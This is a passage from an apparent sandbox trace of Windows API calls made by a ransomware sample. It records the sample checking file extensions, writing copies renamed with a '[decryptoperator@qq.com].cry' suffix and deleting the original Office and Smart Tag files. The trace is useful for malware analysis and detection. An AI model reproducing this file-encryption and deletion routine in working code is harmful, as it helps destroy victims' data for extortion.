ReadFile (in: hFile=0x190, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.364] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.365] SetEndOfFile (hFile=0x1c0) returned 1 [0041.365] CloseHandle (hObject=0x1c0) returned 1 [0041.365] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.365] SetEndOfFile (hFile=0x190) returned 1 [0041.366] CloseHandle (hObject=0x190) returned 1 [0041.366] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0041.366] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml")) returned 1 [0041.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.366] lstrlenW (lpString=".doc") returned 4 [0041.366] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.366] lstrlenW (lpString=".docx") returned 5 [0041.366] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.366] lstrlenW (lpString=".pdf") returned 4 [0041.366] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.366] lstrlenW (lpString=".xls") returned 4 [0041.366] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.366] lstrlenW (lpString=".xlsx") returned 5 [0041.367] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.367] lstrlenW (lpString=".ppt") returned 4 [0041.367] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.367] lstrlenW (lpString=".zip") returned 4 [0041.367] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.367] lstrlenW (lpString=".rar") returned 4 [0041.367] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.367] lstrlenW (lpString=".bz2") returned 4 [0041.367] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.367] lstrlenW (lpString=".7z") returned 3 [0041.367] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.367] lstrlenW (lpString=".dbf") returned 4 [0041.367] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.367] lstrlenW (lpString=".1cd") returned 4 [0041.367] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.367] lstrlenW (lpString=".jpg") returned 4 [0041.367] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.367] lstrlenW (lpString=".doc") returned 4 [0041.367] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.367] lstrlenW (lpString=".docx") returned 5 [0041.367] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.367] lstrlenW (lpString=".pdf") returned 4 [0041.367] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.367] lstrlenW (lpString=".xls") returned 4 [0041.367] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.367] lstrlenW (lpString=".xlsx") returned 5 [0041.367] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.367] lstrlenW (lpString=".ppt") returned 4 [0041.367] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.367] lstrlenW (lpString=".zip") returned 4 [0041.367] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.368] lstrlenW (lpString=".rar") returned 4 [0041.368] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.368] lstrlenW (lpString=".bz2") returned 4 [0041.368] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.368] lstrlenW (lpString=".7z") returned 3 [0041.368] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.368] lstrlenW (lpString=".dbf") returned 4 [0041.368] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.368] lstrlenW (lpString=".1cd") returned 4 [0041.368] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.368] lstrlenW (lpString=".jpg") returned 4 [0041.368] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.368] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0041.368] lstrlenW (lpString="WordMUI.XML") returned 11 [0041.368] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0041.368] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=1800) returned 1 [0041.368] CloseHandle (hObject=0x190) returned 1 [0041.368] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml")) returned 0x20 [0041.369] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0041.369] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0041.369] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.369] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.369] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0041.370] GetLastError () returned 0x0 [0041.370] ReadFile (in: hFile=0x190, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x708, lpOverlapped=0x0) returned 1 [0041.374] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x710, lpOverlapped=0x0) returned 1 [0041.375] ReadFile (in: hFile=0x190, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.375] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xea, lpOverlapped=0x0) returned 1 [0041.375] SetEndOfFile (hFile=0x1c0) returned 1 [0041.375] CloseHandle (hObject=0x1c0) returned 1 [0041.378] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.378] SetEndOfFile (hFile=0x190) returned 1 [0041.378] CloseHandle (hObject=0x190) returned 1 [0041.378] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0041.379] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml")) returned 1 [0041.379] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.379] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.379] lstrlenW (lpString=".doc") returned 4 [0041.379] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.379] lstrlenW (lpString=".docx") returned 5 [0041.379] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.379] lstrlenW (lpString=".pdf") returned 4 [0041.379] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.379] lstrlenW (lpString=".xls") returned 4 [0041.379] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.379] lstrlenW (lpString=".xlsx") returned 5 [0041.379] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.379] lstrlenW (lpString=".ppt") returned 4 [0041.379] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.379] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.379] lstrlenW (lpString=".zip") returned 4 [0041.379] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.379] lstrlenW (lpString=".rar") returned 4 [0041.379] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.379] lstrlenW (lpString=".bz2") returned 4 [0041.379] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.379] lstrlenW (lpString=".7z") returned 3 [0041.379] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.379] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.379] lstrlenW (lpString=".dbf") returned 4 [0041.379] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.379] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.380] lstrlenW (lpString=".1cd") returned 4 [0041.380] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.380] lstrlenW (lpString=".jpg") returned 4 [0041.380] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.380] lstrlenW (lpString=".doc") returned 4 [0041.380] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.380] lstrlenW (lpString=".docx") returned 5 [0041.380] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.380] lstrlenW (lpString=".pdf") returned 4 [0041.380] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.380] lstrlenW (lpString=".xls") returned 4 [0041.380] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.380] lstrlenW (lpString=".xlsx") returned 5 [0041.380] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.380] lstrlenW (lpString=".ppt") returned 4 [0041.380] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.380] lstrlenW (lpString=".zip") returned 4 [0041.380] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.380] lstrlenW (lpString=".rar") returned 4 [0041.380] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.380] lstrlenW (lpString=".bz2") returned 4 [0041.380] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.380] lstrlenW (lpString=".7z") returned 3 [0041.380] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.380] lstrlenW (lpString=".dbf") returned 4 [0041.380] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.380] lstrlenW (lpString=".1cd") returned 4 [0041.380] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.380] lstrlenW (lpString=".jpg") returned 4 [0041.380] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.381] lstrcmpiW (lpString1=".HTM", lpString2=".cry") returned 1 [0041.381] lstrlenW (lpString="MCABOUT.HTM") returned 11 [0041.381] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0041.381] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=11463) returned 1 [0041.382] CloseHandle (hObject=0x190) returned 1 [0041.382] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm")) returned 0x20 [0041.382] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0041.382] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0041.382] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.382] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.382] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0041.383] GetLastError () returned 0x0 [0041.383] ReadFile (in: hFile=0x190, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x2cc7, lpOverlapped=0x0) returned 1 [0041.677] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x2cd0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x2cd0, lpOverlapped=0x0) returned 1 [0042.089] ReadFile (in: hFile=0x190, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.090] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xea, lpOverlapped=0x0) returned 1 [0042.090] SetEndOfFile (hFile=0x1c0) returned 1 [0042.090] CloseHandle (hObject=0x1c0) returned 1 [0042.198] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.198] SetEndOfFile (hFile=0x190) returned 1 [0042.199] CloseHandle (hObject=0x190) returned 1 [0042.199] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0042.199] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm")) returned 1 [0042.200] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0042.200] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0042.200] lstrlenW (lpString=".doc") returned 4 [0042.200] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0042.200] lstrlenW (lpString=".docx") returned 5 [0042.200] lstrcmpiW (lpString1=".docx", lpString2="T.HTM") returned -1 [0042.200] lstrlenW (lpString=".pdf") returned 4 [0042.200] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0042.200] lstrlenW (lpString=".xls") returned 4 [0042.200] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0042.200] lstrlenW (lpString=".xlsx") returned 5 [0042.200] lstrcmpiW (lpString1=".xlsx", lpString2="T.HTM") returned -1 [0042.200] lstrlenW (lpString=".ppt") returned 4 [0042.200] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0042.200] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0042.200] lstrlenW (lpString=".zip") returned 4 [0042.200] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0042.200] lstrlenW (lpString=".rar") returned 4 [0042.200] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0042.200] lstrlenW (lpString=".bz2") returned 4 [0042.200] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0042.200] lstrlenW (lpString=".7z") returned 3 [0042.200] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0042.200] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0042.200] lstrlenW (lpString=".dbf") returned 4 [0042.200] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0042.200] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0042.200] lstrlenW (lpString=".1cd") returned 4 [0042.200] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0042.200] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0042.200] lstrlenW (lpString=".jpg") returned 4 [0042.200] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0042.200] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0042.200] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0042.200] lstrlenW (lpString=".doc") returned 4 [0042.201] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0042.201] lstrlenW (lpString=".docx") returned 5 [0042.201] lstrcmpiW (lpString1=".docx", lpString2="T.HTM") returned -1 [0042.201] lstrlenW (lpString=".pdf") returned 4 [0042.201] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0042.201] lstrlenW (lpString=".xls") returned 4 [0042.201] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0042.201] lstrlenW (lpString=".xlsx") returned 5 [0042.201] lstrcmpiW (lpString1=".xlsx", lpString2="T.HTM") returned -1 [0042.201] lstrlenW (lpString=".ppt") returned 4 [0042.209] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0042.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0042.209] lstrlenW (lpString=".zip") returned 4 [0042.209] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0042.209] lstrlenW (lpString=".rar") returned 4 [0042.209] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0042.209] lstrlenW (lpString=".bz2") returned 4 [0042.209] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0042.209] lstrlenW (lpString=".7z") returned 3 [0042.209] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0042.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0042.209] lstrlenW (lpString=".dbf") returned 4 [0042.209] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0042.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0042.210] lstrlenW (lpString=".1cd") returned 4 [0042.210] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0042.210] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0042.210] lstrlenW (lpString=".jpg") returned 4 [0042.210] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0042.210] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0042.210] lstrlenW (lpString="STOCKS.XML") returned 10 [0042.210] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0042.477] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=2687) returned 1 [0042.477] CloseHandle (hObject=0x190) returned 1 [0042.477] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml")) returned 0x20 [0042.477] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.477] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0042.477] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.477] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.477] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0042.478] GetLastError () returned 0x0 [0042.478] ReadFile (in: hFile=0x190, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, 